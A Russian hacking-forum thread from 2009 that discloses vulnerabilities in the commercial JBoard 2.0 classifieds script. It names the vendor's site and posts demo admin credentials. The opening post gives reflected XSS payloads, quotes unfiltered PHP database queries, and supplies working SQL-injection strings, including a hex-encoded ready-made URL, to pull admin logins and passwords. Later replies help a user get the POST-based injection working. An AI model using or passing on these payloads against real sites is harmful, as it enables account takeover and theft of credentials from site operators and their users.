ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

JBoard Ver.2.0 Коммерческая версия
  #1  
Старый 03.02.2009, 09:18
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию JBoard Ver.2.0 Коммерческая версия

JBoard Ver.2.0 Коммерческая версия
Офф сайт: http://allpublication.ru/
Demo: http://allpublication.ru/board/demo/
admin;admin
Версия: 2.0

Пассивная XSS
editform.php?notice=<script>alert()</script>
*?user_title=</title><script>alert()</script>
* любые страницы, т.к. уязвимость в inc/head.inc.php
core/edit_user_message.php?edit_user_message="><script> alert()</script><noscript>

SQL-INJ
Присутствует на странице sboard.php
sboard.php :
PHP код:
elseif (!@$_GET['id_mess'] && !@$_GET['id_cat'] && (@$_GET['op'] == "all_cat" || @$_GET['city'])) require_once("core/all_cat.php"); 
all_cat.php
PHP код:
if ($c['print_top'] == "yes") require_once("inc/top_add.inc.php"); 
top_add.inc.php
Идет запрос в БД с параметром $_GET['city'], который нигде не фильтруется
PHP код:
if (@$_GET['city'])
{
    
$from_city_query mysql_query ("SELECT city_name FROM jb_city WHERE city_translit = '".$_GET['city']."' LIMIT 1"); 
    if (
mysql_num_rows ($from_city_query) == 1)
    {
        
$from_city mysql_fetch_assoc ($from_city_query);
        
$city_from_search " AND city = '".$from_city['city_name']."' "
Результат используется во втором запросе
PHP код:
$top_add = mysql_query ("SELECT A.id as board_id, A.*, B.* FROM jb_board as A, jb_board_cat as B WHERE A.id_category = B.id AND old_mess = 'old' ".@$city_from_search." ORDER by hits DESC LIMIT $limit"); 
if (mysql_num_rows($top_add))
{
?>

<H4><?=$lang[610]?></H4>
<table border="0" class="GRayBox" cellpadding="0" cellspacing="0">
  <tr class="top">
    <td class="img1">&nbsp;</td>
    <td class="img2">&nbsp;</td>
    <td class="img3">&nbsp;</td>
  </tr>
  <tr>
    <td class="imgL">&nbsp;</td>
    <td class="t"><a href="#">
      <?
    
while ($top mysql_fetch_assoc ($top_add))
    {
        
$tip str_replace("\r\n"," "htmlspecialchars($top['text']));
        echo 
"<a href=\"".$h."/advertisement/nesting/".$top['id_category']."/kind/".$top['board_id']."/\" onmouseover=\"Tip('".$tip."')\"><strong>".$top['title']."</strong></a>";
Ядовитый запрос для первого запроса (прям тафталогия):
a' UNION SELECT 1 --
Для второго запроса:
a' UNION SELECT 1,2,3,4,5,6,concat_ws(0x3,login,password),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34 FROM jb_admin --
Переведем в число(*16):
0x612720554e494f4e2053454c45435420312c322c332c342c 352c362c636f6e6361745f7773283078332c6c6f67696e2c70 617373776f7264292c382c392c31302c31312c31322c31332c 31342c31352c31362c31372c31382c31392c32302c32312c32 322c32332c32342c32352c32362c32372c32382c32392c3330 2c33312c33322c33332c33342046524f4d206a625f61646d69 6e202d2d20

В итоге получаем следующий запрос:
sboard.php?city=a'+union+select+0x612720554e494f4e 2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20%20--%20

SQL-INJ
POST запрос к /core/select.php
aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --
Вывод будет в последнем элементе выпадающего списка
Уязвимый кусок кода: целиком весь файл)
 
Ответить с цитированием

  #2  
Старый 03.02.2009, 12:49
Аватар для [x26]VOLAND
[x26]VOLAND
Moderator - Level 7
Регистрация: 07.06.2006
Сообщений: 556
Провел на форуме:
7549607

Репутация: 2702


Отправить сообщение для [x26]VOLAND с помощью ICQ Отправить сообщение для [x26]VOLAND с помощью AIM
По умолчанию

Мда, и этот быдлокод ещё коммерческий... Кошмар.
 
Ответить с цитированием

  #3  
Старый 28.04.2009, 18:14
Аватар для demon201984
demon201984
Новичок
Регистрация: 24.04.2009
Сообщений: 1
Провел на форуме:
680

Репутация: 0
Arrow

SQL-INJ
POST запрос к /core/select.php
aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --
Вывод будет в последнем элементе выпадающего списка
Уязвимый кусок кода: целиком весь файл)[/QUOTE]

Пробовал вводить в строке браузера этот запрос выводит лишь список категорий в последнем элементе выпадащего списка ничего нет.

Запрос вводил в формате: http://www.sait.ru/core/select.php?aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --

Я что-то неверно ввожу или автор этот баг уже исправил?
 
Ответить с цитированием

  #4  
Старый 16.05.2009, 23:10
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Цитата:
Сообщение от demon201984  
Цитата:
SQL-INJ
POST запрос к /core/select.php
aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --
Вывод будет в последнем элементе выпадающего списка
Уязвимый кусок кода: целиком весь файл)
Пробовал вводить в строке браузера этот запрос выводит лишь список категорий в последнем элементе выпадащего списка ничего нет.

Запрос вводил в формате: http://www.sait.ru/core/select.php?aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --

Я что-то неверно ввожу или автор этот баг уже исправил?
Читать умеешь? POST запрос

PS: переменная id_category
 
Ответить с цитированием

  #5  
Старый 16.05.2009, 23:38
Аватар для fl00der
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

Блин, ну вот как вы это нашли, я понять просто не в силах...
Особенно вот это:
sboard.php?city=a'+union+select+0x612720554e494f4e 2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20%20--%20
 
Ответить с цитированием

  #6  
Старый 13.10.2009, 07:12
Аватар для bluesky
bluesky
Новичок
Регистрация: 26.09.2009
Сообщений: 9
Провел на форуме:
92035

Репутация: 0
По умолчанию

Читать умеешь? POST запрос
PS: переменная id_category[/QUOTE]
Так подскажите как и чем можно реализовать сори за тупость, просто надо
 
Ответить с цитированием

  #7  
Старый 13.10.2009, 07:17
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от fl00der  
Блин, ну вот как вы это нашли, я понять просто не в силах...
Особенно вот это:
sboard.php?city=a'+union+select+0x612720554e494f4e 2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20%20--%20
https://forum.antichat.ru/thread43966.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какая версия Icq лучше... F-IFTY ICQ 51 11.12.2007 00:36
Внимание! Virustotal опасен! Herevef Защита ОС: вирусы, антивирусы, файрволы. 12 17.10.2007 12:53
Полная версия Windows Vista появилась в файлообменных сетях KPOT_f!nd Мировые новости 2 13.11.2006 19:18
Fedora Core - новая версия! Zek Soft - *nix 7 28.10.2006 03:41
Антивирус "Лаборатории Касперского" лучший в мире @lcash Мировые новости 27 13.09.2006 23:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ